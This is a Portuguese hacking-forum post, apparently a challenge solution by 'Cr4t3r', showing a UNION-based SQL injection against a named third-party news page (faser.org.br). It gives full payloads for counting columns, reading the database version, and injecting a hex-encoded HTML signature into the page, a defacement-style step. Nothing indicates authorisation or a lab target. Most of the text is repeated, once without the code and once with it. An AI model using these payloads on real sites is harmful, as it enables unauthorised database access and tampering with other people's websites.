Eis a resolução para o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Precisamos ver quantas colunas existem no server usando o comando order by.
*Order by 1,2,3,4,5,6,7,8[Sem erro]
*Order by 1,2,3,4,5,6,7,8,9[Sem erro]
*Order by 1,2,3,4,5,6,7,8,9,10[Sem erro]
Como a imagem abaixo:
Seguindo:
*Order by 1,2,3,4,5,6,7,8,9,10,11[Erro !]
Agora vamos usar o comando union all select para concatenar as tabelas.
assim >
Certo, é a tabela três, então vamos ver o versão do banco. assim:
Através da hackbar vamos encodar nosso html em meio ao SQLI como nas imagens
E depois de encodado nosso html em Hex irá ficar assim:
Como vocês viram na imagem acima conseguimos encodar nosso html em hex, porém como vamos adicionar na nossa injeção ?
assim:
lembrando que para que se interprete como hex ne necessário adicionar a frente o número 0 e a letra x assim > "0x" < e depois o código encodado, ficaria mais ou menos assim.
Como na imagem abaixo:
e apenas precisamos pressionar enter para carregar a url e "TARAM":
Aguardem os próximos desafios minhas crianças '-'
Att. Cr4t3r
Ranking:
1º andreol263
2º ....
3º ....
Espero mais participantes na próxima vez.
Precisamos ver quantas colunas existem no server usando o comando order by.
*Order by 1,2,3,4,5,6,7,8[Sem erro]
*Order by 1,2,3,4,5,6,7,8,9[Sem erro]
*Order by 1,2,3,4,5,6,7,8,9,10[Sem erro]
Como a imagem abaixo:
Seguindo:
*Order by 1,2,3,4,5,6,7,8,9,10,11[Erro !]
Agora vamos usar o comando union all select para concatenar as tabelas.
assim >
Código:
-691+union+all+select+1,2,3,4,5,6,7,8,9,10--
Certo, é a tabela três, então vamos ver o versão do banco. assim:
Código:
http://faser.org.br/noticias.php?id=-691+union+all+select+1,2,concat(version()),4,5,6,7,8,9,10--
E depois de encodado nosso html em Hex irá ficar assim:
Como vocês viram na imagem acima conseguimos encodar nosso html em hex, porém como vamos adicionar na nossa injeção ?
assim:
Código:
-691+union+all+select+1,2,concat(version(),AQUI VAI O CÓDIGO),4,5,6,7,8,9,10--
Código:
-691+union+all+select+1,2,concat(version(),0x3c666f6e742d636f6c6f723d22677265656e223e3a204279204372347433723c2f666f6e743e),4,5,6,7,8,9,10--
e apenas precisamos pressionar enter para carregar a url e "TARAM":
Aguardem os próximos desafios minhas crianças '-'
Att. Cr4t3r
Ranking:
1º andreol263
2º ....
3º ....
Espero mais participantes na próxima vez.
Comment